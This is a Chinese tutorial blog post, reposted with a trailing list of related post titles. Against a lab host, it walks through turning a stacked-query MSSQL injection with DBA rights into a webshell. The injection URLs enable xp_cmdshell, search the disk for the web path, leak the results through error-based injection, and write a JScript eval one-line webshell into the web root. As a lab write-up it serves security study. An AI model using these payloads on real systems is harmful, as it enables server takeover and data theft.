前言

本文主要通过一个案例来演示一下当MSSQL是DBA权限,且不知道路径的时候如何去获取WEBSHELL。当然这种方式对站库分离的无效。
我测试的环境是在Win7 64位下,数据库是SQLServer 2000,IIS版本是7.5,程序是采用风讯的CMS。后台登录后有多处注入,因为这里是演示用注入获取WEBSHELL,因此就不考虑后台上传的情况了,只是用注入来实现。

过程

首先找到一个如下的注入点:

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1' and 1=user;--

通过SQLMAP可以查看到是DBA权限

创建临时表

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1';CREATE TABLE tt_tmp (tmp1 varchar(8000));--

在WINDOWS下查找文件用如下命令:

for /r 目录名:\ %i in (匹配模式) do @echo %i

例如在C盘下搜索NewsList.aspx,可以使用for /r c:\ %i in (Newslist*.aspx) do @echo %i或者for /r c:\ %i in (Newslist.aspx*) do @echo %i

使用for /r c:\ %i in (Newslist*.aspx) do @echo %i的搜索结果

一定要在匹配模式里面加上一个*号,不然搜索出来的是全部的目录,后面拼接了你搜索的内容。
使用for /r c:\ %i in (Newslist.aspx) do @echo %i的搜索结果

用xp_cmdshell执行查找文件的命令,并将搜索的结果插入到临时表中

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1';insert into tt_tmp(tmp1) exec master..xp_cmdshell 'for /r c:\ %i in (Newslist*.aspx) do @echo %i ';--

如果无法执行xp_cmdshell,并提示如下错误SQL Server阻止了对组件‘xp_cmdshell’的过程‘sys.xp_cmdshell’的访问。因为此组件已作为此服务嚣安全配置的一部分而被关闭。系统管理员可以通过使用sp_configure启用‘xp_cmdshell’。

可以使用如下命令来启用xp_cmdshell

;EXEC sp_configure 'show advanced options',1;//允许修改高级参数
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1; //打开xp_cmdshell扩展
RECONFIGURE;--

然后再次执行搜索命令。

在执行上述搜索和插入过程后,可以使用' and (select(*) from tt_tmp)>1页面返回是否正常来判断是否有搜索结果。当没有找到的话,select(*) from tt_tmp的结果为1,否则大于1。如果没有的话,就换目录,可以试试其他盘符,如';insert into tt_tmp(tmp1) exec master..xp_cmdshell 'for /r d:\ %i in (Newslist*.aspx) do @echo %i ';--。也可以使用sqlmap来查看条数。

可以用报错将表内容给显示出来

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=2' and 1=(select top 1 tmp1 from tt_tmp)and 'a'='a

继续爆

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=2' and 1=(select top 1 tmp1 from tt_tmp where tmp1 not in ('c:\inetpub\wwwroot\manage\news\NewsList.aspx '))and 'a'='a

也可以用sqlmap直接将表中数据读取出来

然后根据导出结果的路径来判断是否可能为WEB目录。然后写入一个测试文件,看是否可以访问来进一步证实结果。

这里在根目录写了一个txt文件,写别的目录怕因为没有权限而无法访问。

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1';exec master..xp_cmdshell 'echo test >c:\\WWW\\2333.txt';--

然后访问http://192.168.232.138:81/2333.txt

成功访问,然后就是写一句话

http://192.168.232.138:81/manage/news/Newslist.aspx?ClassID=1';exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > c:\\WWW\\233.aspx' ;--

DOS命令将文件写入文本中时,遇到<>应在前面加上^。成功写入。然后就是进一步的操作了,这里就不概述了。

总结:

这里一共有三个小的知识点:
1.sa用户如何开启xp_cmdshell

EXEC sp_configure 'show advanced options',1;//允许修改高级参数
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1; //打开xp_cmdshell扩展
RECONFIGURE;

2.Windows下利用dos如何搜索文件

for /r c:\ %i in (Newslist*.aspx) do @echo %i
for /r c:\ %i in (Newslist.aspx*) do @echo %i

3.dos命令下写文件遇到<>如何处理

echo ^<^> > 123.txt

参考:

[1]Windows命令行(cmd)下快速查找文件(类似Linux下find命令) 
[2]技术分享:MSSQL注入xp_cmdshell

转载于:https://www.cnblogs.com/backlion/p/6869595.html

MSSQL DBA权限获取WEBSHELL的过程相关推荐

  1. Shopex4.85 cms后台管理员权限获取webshell

    simeon Shopex(上海商派网络科技有限公司的简称)成立于2002年,是中国电子商务技术及服务提供商,主要向市场提供PC端.移动端和线下的软件系统及相关服务.阿里巴巴.联想和贝塔斯曼对其进行了 ...

  2. sqlmap 连接mysql_sqlmap从入门到精通-第三章-4-4-使用sqlmap直连MSSQL获取webshell或权限...

    4.4 使用sqlmap直连MSSQL获取webshell或权限 在某些情况下可能不存在SQL注入漏洞,但是通过发现目标源代码泄露,备份泄露,文件包含等方法获取了数据库服务器的IP地址,数据库账户和密 ...

  3. 2017-2018-2 20155303『网络对抗技术』Final:Web渗透获取WebShell权限

    2017-2018-2 『网络对抗技术』Final:Web渗透获取WebShell权限 --------CONTENTS-------- 一.Webshell原理 1.什么是WebShell 2.We ...

  4. burp放包_Burp Suite截断改包发包获取Webshell

    本帖最后由 wangxiulin 于 2016-11-17 12:11 编辑 难易程度  ★★★ 阅读点   截断发包方式 文章作者  wangxiulin 文章来源  i春秋论坛 前言 今天就是先来 ...

  5. 获取Webshell的常用方法(一)

    Webshell是以php.asp.jsp等网站脚本文件形式存在的一种网页后门,使攻击者可以用web请求的方式与目标网站进行交互,控制网站服务器,进而执行上传工具.下载文件.执行命令等操作. 本文主要 ...

  6. 使用sqlmap直连数据库获取webshell

    在有些场景下,需要通过mysql直接连接来获取权限,例如通过暴力破解.嗅探等方法获取了账号及口令,服务器有可能未开放web服务. 0X001 适用场景 1.获取了Mysql数据库root账号以及密码. ...

  7. 华为+android+root权限获取root,华为root权限怎么开启怎么获取(简单华为手机ROOT教程)...

    购置安卓系统手机后,一些泼懂技术的人群常常会因为是否ROOT而犹豫不决,没有尝试过ROOT后获取全部手机权限的滋味,自然心理痒痒的,但是又听说ROOT后有种种不好效果,比如删除系统文件无法正常运行手机 ...

  8. 【转】Android权限获取机制与常见权限不足问题分析

    转自:http://blog.csdn.net/linweig/article/details/6127488# Android系统是运行在Linux内核上的,Android与Linux分别有自己的一 ...

  9. root权限获取排行榜,root权限软件排行榜

    VIVOX7的root权限怎么获取? vivo手机是不可以获取root的,建议不要轻易将手机root. ROOT是一种存在于UNIX系统(如AIX.BSD等)和类UNIX系统(如大名鼎鼎的Linux, ...

最新文章

  1. Redis持久化 - RDB和AOF
  2. hdu Remainder
  3. python walk 遍历文件夹 文件大小
  4. android 之 使用显示意图和隐式意图完成Activity的跳转
  5. 在研究的道路上到底还能走多远
  6. lumanager mysql密码_LuManager单独安装mysqli
  7. oracle undo head,淺談Oracle的undo管理
  8. MacOS emacs Command “pyls“ is not present on the path.报错及解决
  9. 马斯克2021五大预测:重返月球并比赛遥控汽车,全面实现自动驾驶,你pick哪一个?...
  10. MySQL(三)表记录的更新操作
  11. PAIP.ASP重复INCLUDE包含引起的重定义错误解决方案
  12. 详解VMware虚拟机中添加新硬盘并挂载的方法
  13. Git: The following paths are ignored by one of your .gitignore files: xxx.dll
  14. 前后端分离-CRUD
  15. 基于Arduino的吉他调音器
  16. 自己的网站被劫持跳转时该怎么解决?
  17. iReport与JasperReport中如何支持文支持显示
  18. python做地图热力图保存为png_Python如何实现热力图?可视化入库图实战演示
  19. 2021年美国大学生数学建模竞赛C题参考翻译
  20. 互联网协议 — DNS 域名系统

热门文章

  1. 《c专家编程》笔记--define和typedef的区别
  2. 初学者应该了解的一些SQL语句及hr 用户解锁相关
  3. 在WinForm中实现省市级联的效果
  4. 宝剑锋从磨砺出——使用在线评测平台磨砺C#使用能力
  5. es6 --- Promise封装读取文件操作
  6. DOM-14 【实战】解决事件代理和鼠标移动事件的窘态
  7. 老男孩博客园杨海潮MySQL--MySQL机构逻辑2
  8. Hibernate5-多对1(n:1)-fetch=join
  9. unity, 颜色随高度渐变shader
  10. [Mac]一些命令技巧